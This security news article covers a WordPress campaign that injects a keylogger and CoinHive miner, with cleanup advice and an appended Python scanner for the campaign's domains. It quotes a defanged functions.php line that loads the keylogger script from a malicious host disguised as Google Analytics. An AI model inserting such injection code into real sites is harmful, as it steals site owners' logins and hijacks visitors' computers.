Thousands Of WordPress Websites Have Been Infected With A Key-logger & In-Browser Cryptocurrency Miner


Security researchers from Sucuri have found that about 2,000 WordPress websites are infected with a malicious script that runs a keylogger on the WordPress backend login page and an in-browser cryptocurrency miner called CoinHive on the sites' frontends.

The researchers said that the new attack is tied to a similar operation in early December 2017 that infected over 5,500 WordPress websites. Both incidents used keylogger and cryptocurrency-mining malware named cloudflare[.]solutions, after the domain used to serve the malware in the first attack.

Cybercriminals inject these malicious scripts into the source code of WordPress sites with weak or outdated security.

According to Sucuri researchers:
The cdjs[.]online script is injected into either a WordPress database (wp_posts table) or into the theme’s functions.php file, just like we saw in the former cloudflare[.]solutions attack. The cdns[.]ws and msdns[.]online scripts can also be found injected into the theme’s functions.php file:

"function chmnr_klgr_enqueue_script() {wp_enqueue_script( 'chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false );"

The new campaigns do not yet seem to be as large as the first malware campaign, but many websites failed to secure themselves properly after the original infection.

“To clean up a website that has been compromised with this infection, you’ll need to remove the malicious code from theme’s functions.php, scan wp_posts table for possible injections, change all WordPress passwords(!) and update all server software including third-party themes and plugins.”
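The first two cleanup steps can be checked mechanically. The following is an added example, not code from Sucuri or from this article: it scans each theme's functions.php and exported wp_posts rows for the domains and the `chmnr_klgr` function prefix named above. The function names and the (ID, post_content) row format are assumptions made for illustration.

```python
import re
from pathlib import Path

# Indicators named in the article, stored defanged and refanged only in memory.
DEFANGED = ["cloudflare[.]solutions", "cdjs[.]online", "cdns[.]ws", "msdns[.]online"]
DOMAINS = [d.replace("[.]", ".") for d in DEFANGED]
# Function-name prefix seen in the injected functions.php snippet quoted above.
FUNC_PREFIX = "chmnr_klgr"

# Match a listed domain or any subdomain of it, but not look-alikes such as
# "mycdns.ws" or "cdns.wsx".
DOMAIN_RE = re.compile(
    r"(?<![\w.-])(?:[\w-]+\.)*(" + "|".join(map(re.escape, DOMAINS)) + r")(?![\w-])",
    re.IGNORECASE,
)

def find_indicators(text):
    """Return the sorted, de-duplicated indicators present in one text blob."""
    hits = {m.group(1).lower() for m in DOMAIN_RE.finditer(text)}
    if FUNC_PREFIX in text:
        hits.add(FUNC_PREFIX)
    return sorted(hits)

def scan_themes(wp_root):
    """Check functions.php of every installed theme, active or not."""
    findings = {}
    for path in sorted(Path(wp_root).glob("wp-content/themes/*/functions.php")):
        hits = find_indicators(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.parent.name] = hits
    return findings

def scan_posts(rows):
    """rows: (ID, post_content) pairs exported from the wp_posts table."""
    findings = {}
    for post_id, content in rows:
        hits = find_indicators(content)
        if hits:
            findings[post_id] = hits
    return findings

if __name__ == "__main__":
    # Constructed sample rows; the script path "/x.js" is made up.
    rows = [(1, "<p>Hello world</p>"),
            (2, "<script src='https://%s/x.js'></script>" % DOMAINS[1])]
    print(scan_posts(rows))  # only post 2 is reported
```

A clean result only means these specific indicators are absent; the password changes and software updates from the quoted advice still apply.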

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]
